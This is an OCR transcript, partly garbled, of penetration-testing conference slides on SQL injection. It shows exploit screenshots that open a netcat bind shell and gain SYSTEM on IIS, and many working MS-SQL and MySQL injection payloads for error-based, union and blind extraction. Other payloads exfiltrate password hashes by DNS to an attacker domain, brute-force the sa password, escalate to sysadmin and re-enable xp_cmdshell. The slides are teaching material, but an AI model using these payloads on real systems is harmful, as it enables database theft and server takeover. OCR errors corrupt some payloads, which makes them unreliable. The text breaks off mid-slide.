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The Last of a Dying Breed 

A Network Penetration Tester 

You know - the nmap, exploit, upload netcat type of guy. 



A.K.A: 

The black guy at security conferences 
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Step 1: Tell customer you are 31337 security professional 
Customers only applied patches if it fixed something on the system 

It was common practice NOT to apply system updates that didn't fix a problem you were 
experiencing on a system (WTF ARE YOU DOING - YOU MIGHT BREAK SOMETHING!!!!!) 

Step 2: Scan customer network with ISS or Nessus if you were a renegade 
Customers didn't apply patches, and rarely even had firewalls and IDSs back then 

You know you only ran ISS because it had nice reports... 

Step 3: Break out your uber 31337 warez and Own it all!!!!! 

You only kept an exploit archive to save time (Hack.co.za was all you needed back then) 

If you could read the screen you could Own the network!!!!!!! 
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Hacking Way Back In The Day 
Fyuw9eLbElr31337yu(±ltl€t8. 
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•I T*mtal 



■ D * 



[r-oot&iang "]f map -sS -0 -p 1-1024 -v 192.168.1.20 

Sterling nnep V. 2.!riBLIfl/ ( num. Insecure. ur|j/ninp/ ) 

Host Unknown 19. elf inflianor (192.158.1.20) appears to be up ... flood. 

Initiating SYH Stealth Scan against Unknounl9 .eff ingnaror (192.168.1.20) 

Adding TCP port 19*5 (state open). 

Adding TCP port 135 (state open). 

The SYH Stealth Scan took 3 seconds tc scan 1021 ports. 

For OSScan assuning that port 135 is open and port 1 Is closed and neither 

are fl reus I led 

Interesting ports on UnkmounllefflnBiflnor (192. 168,1.20): 

(The 1022 ports scanned but not shown below arc in state: closed) 

Port State Service 

13E/tcp open loc-arv 

139 /tcp open netblcs-ssn 

TCP Sequence Prediction: Class-trivial tine dependency 
Difficulty^ (Trivial joke) 

Sequence nmbers; G98D 6996 G9A& 69B0 69B7 69BC 

Rciotc operating systci guess: Hindows NH / Nin95 / Hin9B 

Nnap run completed — 1 IP address (1 host up) scanned in 4 seconds 
[root&wang "]' | 



□ E 



File Edit View Terminal Help 



knoppix@ttyp2[enweratLon]$ telnet 192.168.0.111 21 

Trying 192 . 168. Q. 111. , . 

Connected to 192 . 168. 0. Ill, 

Escape character is '"]' . 

220 2kserver Microsoft FTP Service (Version 5,0), 



telnet* quit 

Connection closed, 

ltnoppiB3:typ2[en»eration]t telnet 192.168.0.111 80 

Trying 192 . 168.0. 111. , , 

Connected to 192,168,0,111, 

Escape character is '"] ' , 



HTTP/1,1 400 Bad Request 

Server: Hicrosoft-IIS/5.0 

Date: Sun, 01 May 2005 08:14:44 GMT 

Content -Type: text /html 

Content- Length: 87 

<htmlxheadxtitle:>Error</titlex/headxtiody>The parameter is incorrect, </body= 

1</html>Connection closed by foreign host, 
knoppix@ttyp2[enwerotiDn]$ | 
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Gdtyirefttaife. 



N Netscape: Welcome to Rootshell I Hosted by connectnet.com 



File Edit View Go Communicator 



Help 



*l ^ 3 ^ ^ fit 4 £ I 

Back Forward Reload Home Search Netscape Print Security Stop 



'f Bookmarks .j Location: 



i 1 L ! 



BJU&i^rnmf) 




Connect tram pitufiaetsiupmes [138,100,17,16 -> 138,100,17,30] (MozUla/4,5 [en] (Xll; U; Linux 2,0,35 i586))log[ 



rootshell archive for 199902 



2/8/99 



accti gris.txt 



2/8/99 



hp5crash.txt 



2/8/99 



icmpquery.c 



2/8/99 



2/8/99 



2/9/99 



Another way to crash HP 5m printers with firmware dated 
before 19960829. 



ffcore.txt 



sendmail892against.txt 



ftpd.txt 



ACC's Tigris Access Terminal server security vunerability 



Send and receive ICMP queries for address mask and current 
time. 



ff.core exploit for Solaris 2.5.1 and 2.6. 



Denial of service attack in Sendmail 8.9.2 with exploit. 



m 



Bna^asB 



M£ 



Die! ^■ifbei'sn Hiifs 



■' U http://ww,pachet5tormsecurity ! 



oi 9/ 



m*\ ©a [ST 







of 15K (at 979 bytes/sec) 



Remote buffer overflows in various FTP servers leads to 
potential root compromise. (ProFTPD 1.2.0prel and Wuarchive 



June tt, 200$ - Vwnet 
Apple Plugs Five Security Holes 



June 2i>, 2006 - Vnmet 

Controversy Erupts Over US Cyber Security 
Czar 



June 2&, 200$ - ZDAIer 

White House Orders Better Security For 
Sensitive Data 



June lh, 200$ - C»et News 
AT&T Unit Settles Government Fraud Charges 



June 2Z, 200$ - Nemforgz 

Gnash, The Free Flash Player, Makes Progress 



June 2$, 200$ 

Suggested Listening 

Artist: Verve Remixed 

Track: Return To Patatfise (Mark De Give-Sow 

Remix) 
June 2$ 200$ 
Random Quote 

If everything seems to be going well, you have 

obviously ovei i i -Steven- Wright 



June 2% 200$ 
Know The Law 



aircrack-ng-0.6.tar.gz (133 KB) 
aircrack-ng Is a set of tools Tor auditing wireiess networks. It's an 
enhanced/reborn version of airtrack. I! consists ofairodump fan 602.11 packet 
capture proyr; i i (an B02.11 packet inject... 

[Mote Info] 



4m 27, 2006 

strongswan-2.7.2.tar.bz2 (2MB) 
strongSwan is a complete iPsec and IKEvl implementation for Linux 2.1 and 2.6 
kernels. It mte rope rates with most other IPsec-Pased VPN products. It is a 
descendant olihe discontinued Free&WAN proje... 

[More Info] 



Jwwe 2$ 2006 
mimedefang-2.57.tar.gz (316 KB) 

NiMEDeiariCi is afi esibie MIME email scanner designed to protect WiiuJuws 

in ii ! 'other kinds of mail 

processing, such as replacing parts of messages with U... 

[More Info] 



■im 20, 2006 

yersinia-0.7.tar.gz (322 KB) 
Yersinia implements several attacks forthe following protocols: Spanning Tree 
(STP), Cisco Discovery (CDF*), Dynamic Host Configuration (DHCP), Hot Standby 
Router (HSRP). Dynamic Tr unking (DTP), 802.1 ... 

[More Info] 



:■ SA-2UU6U513-U.txt 

:■ MyBB-1 .1 .3 

:■ belva-att-unknown. web .vulns. pelt 

:-Kil13r-SA-20O6OS28tXt 

:-UsenetScriptv0.5.txt 

■ i '-"h, ,"! Ott 
:-W)-MKP.txt 
:-MU-200606-02M 
:■ cisco-sa-20062SGS-^p t:d 
:-cisco-sa- 20060628- wesixt 

[ Last 20 | Last 50 | Last 100] 



QQH^H 



:-SA-20060613-0.M 

:■ MyBB-1 .1.3 

:■ Kil13r-SA-20060S28.txt 

:-UsenetScriptv0.5.txt 

Yl,0.tXl 

:-MU-20D606-02.txt 
:■ Cisco- sa-200S2806-ep.txt 
i-cisco-ss- 20060628- wesixt 
:-OpenPKG-SA-20u5.0.11M 
:■ secunia-Opera.txt 
[Last 20 | Last 50 | Last 100] 



Fsiiig 
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Oati tB boes and tie 9389Tdrfe 



rmmatVelocity w u ftp-god — 107x40 



i - r ~ Command Prompt - fp30reg.exs 192.168.0.107 



Command Prompt - execiis.exe 1 92.168.0.107 "nc.em+-l+-p+999" 



i, 



C:SDocuments and SettingsSNoOneSDesktopSUin IIS HacksMIS Sploitz\execiis>execii 
s.exe 192.168.0.107 "nc.exe+-l+-p+9999+-e+cmd.exe" 
iisexec.c ! Microsoft IIS CGI Filename Decode Error ! 
<filipGsecurax.be> 



— Socket created. 
. — Connection made. 



-\Documents and Settings\NoOne\Desktop\windowsexploitsMis5\frontpage>fp30reg.e 
:e 192.168.fl.lB7 



-=< Frontpage fp30reg.dll Overflow Exploit <MS03-05D wer 

by fldik < netnaniac [at] hotmail.KG > 
http://netninja.to.kg 



)[*] Target: 



192.168.0.107 Port: 



[*] Socket initialized... 

[*] Checking for presence of fp30reg.dll... Found! 

[*] Packet injected! 

[*] Sleeping 

[*] Connecting to host: 192.168.0.107 on port 9999 

[*] Dropping to shell... 

'icrosoft Windows 2000 [Uersion E. 00. 2195] 
KC) Copyright 1985-1999 Microsoft Corp. 

::\WlNNT\system32>whoami 

ihoami 

II AUTHOflimSYSTEM 

I:\WINNT\s ystem32>. 



<§» (Untitled) Eth< 



Go Capture Arii!v;;e gfafcfsfclcs Help 



SI fcl gi 



♦ «3 f 2; ■ 



€^ Q, <S^ 






Filter: [(ip.addr eg 192.168.235.126 and ip.addr eg 192.166.235.1) and (tcp.port ei ■*■ Expression... Clear Apply 



Time Source 

9 45.453926 192 . 168 . 2 3T7T 

10 45.463463 192 . 168 . 2 3 5 . 12 S 

11 45.463651 192.168.235.1 



19 117. 
2 117. 
21 117. 
2 2 117. 
2 3 117. 
24 117. 
2 5 117. 
2 6 117. 
2 7 117. 
2 8 117. 

2 9 117. 

3 117. 
^1 117 



:>*r;dnation 

192.168. 235.128 
192 . 163. 235.1 
192.168. 235.128 



Protocol Info 

TCP 1795 > telnet [5YN] seq = Q Ack=0 win = 65535 l_en = i 

TCP telnet > 1795 [SYN, ACK] Seq = Q Ack=l Wnn=32120 

TCP 1795 > telnet [ACK] seq=l Ack=l win=65 53 5 Len=' 



""*"'•" """ , 



| File: (Untitled) 1064 1 






release 6.2 £zoot} 
1686 
. rreed 



. p ' ' ANSI . 



35mp on an i £ 
=ddhhaatt66 



Last login: sun May 8 10:39:07 on ttyl 
[redhat6@l ocalhost redhat6]$ 1 1 ss 

. [Om. [m [redhateel ocal host redhat6]$ ccdd 

[redhat6©localhost /home] % II55 

. [Om. [01; 34measyone. [Om . [01;34nrFtp. [Om 
. [m [redhat6@l ocal host /home]$ cc 

bash: c : c omm and not found 



I 5ave As II Print I Entire conversation (685 bytes) 



[01; 34mhttpd. [Om . [01; 34ml 05t+found. [Om 



> 
v J® A5CII O EBCDIC O Hex Dump O C Arrays O Raw 



\ ± 



F 
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V\felteR=pat 



B 



31337 Penetration Test.odt - OpenOffice.org Writer 



QCeDLjlJ 



File Edit View Insert Format Table Tools Window Help 



- *& 



o 



FR (Default 



[Nimbus Roman No9 L |2 6 |[X][X|[£] B B [1 B EB 



l> 



Page 1/1 



■jZ- 



31337 Security Dudes 



Penetration Test Report 



Your Network SuxH ! ! 
All your boxes are belong to us! ! ! !! 



Default 



7 5% INSRT STD HYP 



© 
© 
© 
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What Did It For Me 

...I used to think Web App Security was stupid sh*t 

"...This stuff isn't hacking" 

...but then I saw demo of a tool called sqlninja upload nc.exe to a host vulnerable to 
sql injection 

I was hooked!!!!!!!!!!!!!!!!!!!! 
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Geez... That's A Lot To Bypass 



More Security Measures are being implemented on company networks today 

Firewalls are common place (perimeter and host-based) 

Anti-Virus is smarter (removes popular hacker tools, and in some cases stops buffer overflows 

Intrusion Detection/Prevention Systems are hard to detect let alone bypass 

NAC Solutions are making their way into networks 

Network/System Administrators are much more security conscious 

IT Hardware/Software vendors are integrating security into their SDLC 
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Agenda 

Getting started 
Background 
Basic Attack Methods 

SQL Injection In The Real World 
Ugh...WTF???? 

Filter & IDS Evasion 

Javascript Validation 
Serverside Filters 
IDS Signatures 
WAF Evasion 
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Assumptions... 



I submitted a talk entitled "SQL Injection for Mere Mortals" and it didn't get 
accepted. Sorry - I am not covering the basics.... 

I am NOT going to teach you the basics of SQL 

I am NOT going to teach you the basics of SQL Injection 

Buy me rum and coke, and I'll teach you anything I know 
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3 Classes of SQLI 



SQL Injection can be broken up into 3 classes 

Inband - data is extracted using the same channel that is used to inject the SQL code. 
This is the most straightforward kind of attack, in which the retrieved data is presented 
directly in the application web page 

Out-of-Band - data is retrieved using a different channel (e.g.: an email with the results of 
the query is generated and sent to the tester) 

Inferential - there is no actual transfer of data, but the tester is able to reconstruct the 
information by sending particular requests and observing the resulting behaviour of the 
website/DB Server. 
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nband: 



Data is extracted using the same channel that is used to inject the SQL 
code. 

This is the most straightforward kind of attack, in which the retrieved data is 
presented directly in the application web page 

So this is our Error-Based, and Union-Based SQL Injections 

http://[site]/page.asp?id=1 or 1=convert(int,(USER))-- 

Syntax error converting the nvarchar value '[jOe]' to a column of data type int. 
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Out-of-band: 

Data is retrieved using a different channel (e.g.: an email with the results of 
the query is generated and sent to the tester). 

This is another way of getting the data out of the server (such as http, or dns). 



http://[site]/page.asp?id=1;declare @host varchar(800); select @host = name + '-' + 
master.sys.fn_varbintohexstr(password_hash) + '.2. pwn3dbyj0e.com' from 
sys.sqljogins; exec('xp_fileexist "\V + @host + , \c$\boot.ini ,,, );-- 




Learn Security Online 



Inferential: 



If the application returns an error message generated by an incorrect query, 
then it is easy to reconstruct the logic of the original query and therefore 
understand how to perform the injection correctly. 

However, if the application hides the error details, then the tester must be 
able to reverse engineer the logic of the original query. 

The latter case is known as "Blind SQL Injection". 

http://[site]/page.asp?id=1;if+not(select+system_user)+<>+ , sa , +waitfor+delay+ , 0:0:10'- 
Ask it if it's running as 'sa' 
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What About Tools???? 



Automated tools are a great way to identify SQLI. 



Yeah they are just be conscious of the different SQL Injection Types. 
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SQL Vuln Scanners 



So let's start with some tools you can use to identify SQLI as well as 
the type they generally identify. 



mieliekoek.pl 


(error based) 


wpoison 


(error based) 


sqlmap 


(blind by default, and union if you specify) 


wapiti 


(error based) 


w3af 


(error, blind) 


paros 


(error, blind) 


sqid 


(error) 



Joe, I am sick of this sh*t what the heck to you mean by error based, blind and union? 
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SQL Injection Types 



Error-Based SQL Injection 
Union-Based SQL Injection 
Blind SQL Injection 

Error: 

Asking the DB a question that will cause an error, and gleening information from the 

error. 

Union: 

The SQL UNION is used to combine the results of two or more SELECT SQL 

statements into a single result. Really useful for SQL Injection :) 

Blind: 

Asking the DB a true/false question and using whether valid page returned or not, or by using 

the time it took for your valid page to return as the answer to the question. 
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My Methodology 



How I test for SQL Injection 

Identify 

* Identify The Injection 

* Determine Injection Type 

Attack 

* Error-Based SQL Injection 

* Union-Based SQL Injection 

* Blind SQL Injection 



(Tool or Manual) 
(Integer or String) 

(Easiest) 

(Great for data extraction) 

(Worst case. ...last resort) 
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Why Focus On Manual Testing 

Now that you understand that there are 3 primary types of SQL Injection.... 

- Can you understand why being able to test for SQLI manually is important? 

- SQL Injection Scanners will generally look for 1 type of injection 

- The scanner may tell you the site isn't vulnerable when it really is. 
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Determine the Injection Type 



Is it integer or string based? 

Integer Injection: 
http://[site]/page.asp?id=1 having 1=1-- 

Column '[COLUMN NAME]' is invalid in the select list because it is not 
contained in an aggregate function and there is no GROUP BY clause. 

String Injection: 
http://[site]/page.asp?id=x" having 1=1-- 

Column '[COLUMN NAME]' is invalid in the select list because it is not 
contained in an aggregate function and there is no GROUP BY clause. 

Determining this is what determines if you need a ' or not. 
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Let's start with MS-SQL syntax 



I would say that MS-SQL Injection is probably the most fun ;) 

There is always the possibility of getting access to a stored procedure 

like xp_cmdshell 

muahahahahahahahahahaha 



We'll spend a little bit of time on MySQL, and not too much time on Oracle as 
its injection syntax is fairly similar to MS-SQL. But primarily for the sake of time 
we'll focus on MS-SQL. 
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Error-Based SQL Injection Syntax for 

extracting the USER 

http://[site]/page.asp?id=1 or 1=convert(int,(USER))-- 

Syntax error converting the nvarchar value '[DB USER]' to a column of 
data type int. 



Grab the database user with USER 
Grab the database name with DBJMAME 
Grab the servername with @@servername 
Grab the Windows/OS version with (Q)(5)version 
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Union-Based SQL Injection Syntax for extracting the USER 

http://[site]/page.asp?id=1 UNION SELECT ALL 1~ 

All queries in an SQL statement containing a UNION operator must have an equal number of 
expressions in their target lists. 

http://[site]/page.asp?id=1 UNION SELECT ALL 1,2-- 

All queries in an SQL statement containing a UNION operator must have an equal number of 
expressions in their target lists. 

http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3- 

All queries in an SQL statement containing a UNION operator must have an equal number of 
expressions in their target lists. 

http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3,4- 

NO ERROR 

http://[site]/page.asp?id=null UNION SELECT ALL 1,USER,3,4» 
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Blind SQL Injection Syntax for extracting the USER 

3 - Total Characters 

http://[site]/page.asp?id=1; IF (LEN(USER)=1) WAITFOR DELAY , 00:00:10'-- 
Valid page returns immediately 

http://[site]/page.asp?id=1; IF (LEN(USER)=2) WAITFOR DELAY 'OOiOOilO'- 
Valid page returns immediately 

http://[site]/page.asp?id=1; IF (LEN(USER)=3) WAITFOR DELAY , 00:00:10 , ~ 
Valid page returns after 10 second delay 
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Dec 


Hex 


Char 


Dec 


Hex 


Char 


Dec 


Hex 


Char 


Dec 


Hex 


Char 






O 


OO 


Null 


32 


20 


Space 


64 


40 


e 


96 


60 


- 






1 


Ol 


Start of heading 


33 


2 1 


! 


65 


41 


A 


97 


61 


a 






2 


02 


Start of text 


34 


22 


rr 


66 


42 


E 


98 


62 


fc. 






3 


03 


End of text 


35 


23 


# 


67 


43 


C 


33 


63 


c 






4 


04 


End of transmit 


3 6 


24 


S 


68 


44 


D 


lOO 


64 


d 






5 


OS 


Enquiry 


37 


25 


% 


69 


45 


E 


lOl 


65 


e 






6 


06 


Acknowledge 


38 


2 6 


£ 


70 


46 


F 


102 


66 


■f. 






7 


07 


Audible bell 


39 


27 


i 


71 


47 


G 


103 


67 


cj 






S 


OS 


Backspace 


40 


28 


( 


72 


48 


H 


104 


68 


h 






9 


09 


Horizontal tab 


41 


29 


) 


73 


49 


I 


105 


69 


i 






io 


OA 


Line feed 


42 


2A 


* 


74 


4A 


J 


106 


6A 


3 






11 


OE 


Vertical tab 


43 


2E 


+ 


75 


4E 


K 


107 


6E 


k 






12 


OC 


Form feed 


44 


2C 


r 


76 


4C 


L 


108 


6C 


1 






13 


OD 


Carriage return 


45 


2D 


- 


77 


4D 


H 


109 


6D 


m 






14 


OE 


Shift out 


46 


2E 


. 


78 


4E 


N 


HO 


6E 


n 






15 


OF 


Shift in 


47 


2F 


/ 


79 


4F 


O 


111 


6F 


o 






16 


IO 


Data link escape 


48 


30 


o 


SO 


SO 


P 


112 


70 


P 






17 


11 


Device control 1 


49 


3 1 


l 


8 1 


51 


Q 


113 


71 


ci 






IS 


12 


Device control 2 


50 


32 


2 


82 


52 


R 


114 


72 


r 






19 


13 


Device control 3 


51 


33 


3 


83 


53 


S 


115 


73 


3 






20 


14 


Device control 4 


52 


34 


4 


84 


54 


T 


116 


74 


t 






2 1 


15 


Neg. acknowledge 


53 


35 


5 


85 


55 


U 


117 


75 


u. 






22 


16 


Synchronous idle 


54 


3 6 


6 


8 6 


56 


V 


118 


76 


V 






23 


17 


End trans, block 


55 


37 


7 


87 


57 


W 


119 


77 


W 






24 


IS 


Cancel 


56 


38 


8 


88 


58 


X 


120 


78 


X 






25 


19 


End of medium 


57 


39 


9 


89 


53 


Y 


12 1 


79 


V 






2 6 


1A 


Substitution 


58 


3A 


: 


90 


5A 


Z 


122 


7A 


z 






27 


IE 


Escape 


53 


3E 


; 


91 


5E 


[ 


123 


7E 


{ 






28 


1C 


File separator 


60 


3C 


< 


92 


5C 


\ 


124 


7C 


1 






29 
30 


ID 
IE 


Group separator 
Record separator 


61 
62 


3D 
3E 


> 


93 
94 


5D 
5E 


] 
.a. 


125 
12 6 


7D 
7E 


} 










3 1 


IF 


Unit separator 


63 


3F 


o 


35 


5F 




127 


7F 


□ 
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Blind SQL Injection Syntax for extracting the USER 



D - 1st Character 

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))>97) WAITFOR DELAY '00:00:10' 

Valid page returns immediately 

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'™ 
Valid page returns immediately 

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'- 
Valid page returns immediately 

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'- 
Valid page returns after 10 second delay 
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Blind SQL Injection Syntax for extracting the USER 



B - 2nd Character 

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY "00:00:1 0'-- 

Valid page returns immediately 

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:1 0'-- (+10 seconds) 
Valid page returns after 10 second delay 
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Blind SQL Injection Syntax for extracting the USER 



O - 3rd Character 

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY "00:00:1 0"- 

Valid page returns immediately 

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>98) WAITFOR DELAY "00:00:1 0'- 
Valid page returns immediately 

and so on 



http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))=111) WAITFOR DELAY '00:00:10'- 
Valid page returns after 10 second delay 

Database User = DBO 
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Let's move on to MySQL syntax 



With MySQL you really only have: 



* Union-Based 

* Blind 
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MySQL 

With MySQL you will typically use union or true/false blind SQL Injection so 
you really need to know a lot about the DB you are attacking such as: 

* number of columns 

* column names 

* path to website 

So you will need to enumerate this information first. 

The UNION operator is used to combine the result-set of two or more SELECT 
statements. Notice that each SELECT statement within the UNION must have 
the same number of columns. The columns must also have similar data types. 
Also, the columns in each SELECT statement must be in the same order. 
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Column number enumeration 

http://[site]/page.php?id=1 order by 10/* <-- gives Unknown column '10' 
in 'order clause' 

http://[site]/page.php?id=1 order by 5/* <-- gives a valid page 

http://[site]/page.php?id=1 order by 6/* <-- gives Unknown column '6' in 
'order clause' 

So now we know there are 5 columns. 

By the way you can do this with MSSQL as well. 
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Building the union 



http://[site]/page.php?id=1 union all select 1,2,3,4,5/* <-- gives a valid page 

Change the first part of the query to a null or negative value so we can see 
what field will echo data back to us. 

http://[site]/page.php?id=-1 union all select 1,2,3,4,5/* <-- gives a valid page but 
with the number 2, and 3 on it 

or 
http://[site]/page.php?id=null union all select 1,2,3,4,5/* <-- gives a valid page 
but with the number 2, and 3 on it 

Now we know that column numbers 2 and 3 will echo data back to us. 
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Building the union 



http://[site]/page.php?id=null union all select 1,2, 3,4,5,6, 71* 



Re-q uest A De mo 



6 



http://[site]/page.php?ld=null union all select 1,2,user(),4,5,@@version,7/* 



Req uest A. De mo 



i/ve lj s r<£S> I o c: ;a_l l~i o st 
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Information Gathering 

http://[site]/page.php?id=null union all select 1,user(), 3,4,5/* 
http://[site]/page.php?id=null union all select 1,2,database(),4,5/* 
http://[site]/page.php?id=null union all select 1,@@version,@@datadir,4,5/* 

Grab the database user with user() 
Grab the database name with database() 
Grab the database version with @@version 
Grab the database data directory with @@datadir 
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Basic SQLI Attack Methods 



Error-Based SQL Injection 

http://[site]/page.asp?id=2 or 1 in (select @@version)- 
Obtaining the version of the OS 



http://[site]/page.asp?id=2 or 1 in (select @@servername)-- 
Obtaining the hostname of the server 



http://[site]/page.asp?id=2 or 1 in (select user)-- 
Obtaining the user 



http://[site]/page.asp?id=2 or 1 in (select db_name(N))-- 

Obtaining the database name(s). N = start with and keep incrementing 
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Basic SQLI Attack Methods 

Union-Based SQL Injection 

http://[site]/page.asp?id=1 UNION SELECT ALL 1- 

All queries in an SQL statement containing a UNION operator must have an equal number 
of expressions in their target lists. 

http://[site]/page.asp?id=1 UNION SELECT ALL 1,2-- 
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3-- 

http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3,4- 

NO ERROR 

You should receive the error with each request, errors not shown to make room for the 

slide 
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Basic SQLI Attack Methods 

Union-Based SQL Injection Cont. (1) 

http://[site]/page.asp?id=-1 UNION SELECT ALL 1,2,3,4- 

http://[site]/page.asp?id=null UNION SELECT ALL 1,2,3,4- 

Look for 1 or even a few numbers to display on the page 

These numbers that are displayed on the page are the column numbers you can use for 

extracting date. Let's say that we see columns 2, and 3 displayed on the screen. 

http://[site]/page.asp?id=-1 UNION SELECT ALL 1,user(),3,4- 

http://[site]/page.asp?id=null UNION SELECT ALL 1,2,@@version,4- 
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Basic SQLI Attack Methods 

True-False Blind SQL Injection 

http://www.site.com/page.php?id=66 AND 1=1- Valid Page 

http://www.site.com/page.php?id=66 AND 1=2-- Error Page 

http://www.site.com/page.php?id=66 AND ORD(MID((VERSION()), 1 , 1 )) > 51 3 

http://www.site.com/page.php?id=66 AND ORD(MID((VERSION()), 1, 1)) > 53 5 

http://www.site.com/page.php?id=66 AND ORD(MID((VERSION()), 1, 1)) > 52 4 

http://www.site.com/page.php?id=66 AND ORD(MID((VERSION()), 2, 1)) > 43 + 
http://www.site.com/page.php?id=66 AND ORD(MID((VERSION()), 2, 1)) > 45 
http://www.site.com/page.php?id=66 AND ORD(MID((VERSION()), 2, 1)) > 46 

http://www.site.com/page.php?id=66 AND ORD(MID((VERSION()), 3, 1)) > 51 3 

http://www.site.com/page.php?id=66 AND ORD(MID((VERSION()), 3, 1)) > 49 1 

http://www.site.com/page.php?id=66 AND ORD(MID((VERSION()), 3, 1)) > 48 

MID() Extract characters from a text field 

retrieved version: 5.0.45 
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Basic SQLI Attack Methods 

Time-Based Blind SQL Injection 

http://[site]/page.asp?id=1;waitfor+delay+ , 0:0:5';-- 

See if it takes 5 seconds to return the page. If it does, then you can ask it questions. 



http://[site]/page.asp?id=1;if+not(substring((select+@@version),%,1)+o+5)+waitfor 

+delay+ , 0:0:5";-- 

Ask it if he is running SQL Server 2000 



http://[site]/page.asp?id=1;if+not(select+system_user)+<>+ , sa , +waitfor+delay+ , 0:0:5'-- 
Ask it if it's running as "sa" 



http://[site]/page.asp?id=1;if+is_srvrolemember( , sysadmin , )+>+0+waitfor+delay+ , 0:0:5 , ;■ 
Ask it if the current user a member of the sysadmin group 
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SQL Injection In the Real World 

In the real world exploiting SQL Injection can be difficult. More and more complex 
dynamic queries are being passed to backend DBs. Also, more and more people know 
not to run a database as 'sa', and they know to remove the xp_ stored procedures. 

It's time to up your game. 

* Ugh...wtf 

* Privilege Escalation 

* Re-Enabling stored procedures 

* Obtaining an interactive command-shell 
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SQL Injection In the Real World 

You know I always trip out on the fact that Ml John is a millionaire and only has a 
vocabulary of "YEAAAHHHHH", and "WUUUUHAAAATTTT". 

Here I am hacking into companies and I'm not even close. What am I doing wrong? 
Maybe I should trade in the shirt, tie, slacks, laptop for a mouth full of gold teeth, 
dreadlocks, baggy pants, 40 oz, and a phat blunt!!!!! 



men.. nan.. .1 love hacking too much...YEAAAAAAHHHHH 
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UGGGGHHH WTF??? (1) 

http://www.http://www.liljon.com/liljon.asp?lil=' 

Gives the error: 

Microsoft OLE DB Provider for SQL Server error '80040e14' 

http://www.liljon.com/liljon.asp?lil=71%20or%201=convert(int,(USER))-- 
Gives the error: 

Microsoft OLE DB Provider for SQL Server error '80040e14' 
Incorrect syntax near ")". 

Hmm....ok, so it doesn't like that right paren so let's add one more to the end of our query. 

http://www.liljon.com/liljon.asp?lil=71%20or%201=convert(int,(USER)))- 

Gives the error: 

Microsoft OLE DB Provider for SQL Server error '80040e07' 

Conversion failed when converting the nvarchar value 'liljon' to data type int. 

Now we know every injection from here on out will require the additional right paren.... 
@@servername()), @@version()), db_name()), etc.... 
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UGGGGHHH WTF??? (1)Cont. 

http://www.liljon.com/liljon.asp?lil=71%20or%201=convert(int,(DB_NAME())))- 

Gives the error: 

Conversion failed when converting the nvarchar value 'yeaaaaaah' to data type int. 

http://www.liljon.com/liljon.asp?lil=71%20or%201=convert(int,(@@VERSION)))- 

Gives the error: 

Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.3054.00 (Intel X86) Mar 23 

2007 16:28:52 Copyright (c) 1988-2005 Microsoft Corporation Workgroup Edition on Windows NT 5.2 (Build 3790: 

Service Pack 2) ' to data type int. 

The database has been enumerated. ..WUUUUHAATTTTT 

The database has been enumerated. ..WUUUUHAATTTTT 

The database has been enumerated. ..WUUUUHAATTTTT 

The database has been enumerated. ..YEEAAAAAAAHHHHHHHHHHHH!!!!!!!!!!!!!!!!!!!!!!!!!! 

Liljohn - Shut the f*ck up....OOKAYYY!!!!!!!!!!!!!!!! 
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UGGGGHHH WTF??? (2) 

http://www.site.com/page.php?id=5%20UNION%20ALL%20SELECT%201-- 
http://www.site.com/page.php?id=5%20UNION%20ALL%20SELECT%201,2-- 

Received error: The text, ntext, or image data type cannot be selected as DISTINCT. 

http://www.site.com/page.php?id=5%20UNION%20ALL%20SELECT%201,2,convert(text, , HELLO , )-- 

http://www.site.com/page.php?id=5%20UNION%20ALL%20SELECT%201,2,convert(text, , HELLO , ),4-- 

http://www.site.com/page.php?id=5%20UNION%20ALL%20SELECT%201,2,convert(text, , HELLO , ),4,5-- 

http://www.site.com/page.php?id=5%20UNION%20ALL%20SELECT%201,2,convert(text, , HELLO , ),4,5,6-- 

http://www.site.com/page.php?id=5%20UNION%20ALL%20SELECT%201,2,convert(text, , HELLO , ),4,5,6,7-- 

http://www.site.com/page.php?id=5%20UNION%20ALL%20SELECT%201,2,convert(text, , HELLO , ),4,5,6,7,8-- 

http://www.site.com/page.php?id=5%20UNION%20ALL%20SELECT%201,2,convert(text, , HELLO , ),4,5,6,7,8,9-- 

Received error: Operand type clash: text is incompatible with int 
http://www.site.com/page.php?id=5%20UNION%20ALL%20SELECT%201,2,convert(text,'HELLO , ),4,5,6,7,8,null-- 

Tips: 

1. Always use UNION with ALL because of image similiar non-distinct field types. By default union tries to get records 
with distinct. 

2. Use NULL in UNION injections for most data type instead of trying to guess string, date, integer 
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Privilege Escalation 



Step 1 : Brute-Force the 'sa' password 

http://[site]/page.asp?id=1;select * from OPENROWSETfSQLOLEDB^'saVJOEVwaitfor 
delay "0:0:50";select 1;');&a=1 

http://[site]/page.asp?id=1;select * from OPENROWSETfSQLOLEDB^'saVjoeVwaitfor 
delay "0:0:50";select 1;');&a=1 

http://[site]/page.asp?id=1;select * from OPENROWSETfSQLOLEDB^'saVjOeVwaitfor 
delay "0:0:50";select 1;');&a=1 

Key point to remember is that we used time-based blind sqli to enumerate the sa account 
password length. This is a great aid in bruteforcing. 
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Privilege Escalation 



Step 2: Add current user to admin group 

http://[site]/page.asp?id=1;select * from OPENROWSETfSQLOLEDBVVsaVjOeVexec 
master.. sp_addsrvrolemember ,, sa","sysadmin";select 1');&a=1 

Key point to remember is that we used time-based blind sqli to enumerate the sa account 
password length. This is a great aid in bruteforcing. 
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Privilege Escalation 



Step 3: Recreate the xp_cmdshell stored procedure 

MSSQL Server 2000 

http://[site]/page.asp?id=1;select * from OPENROWSETfSQLOLEDBVVsaVjOeVselect 

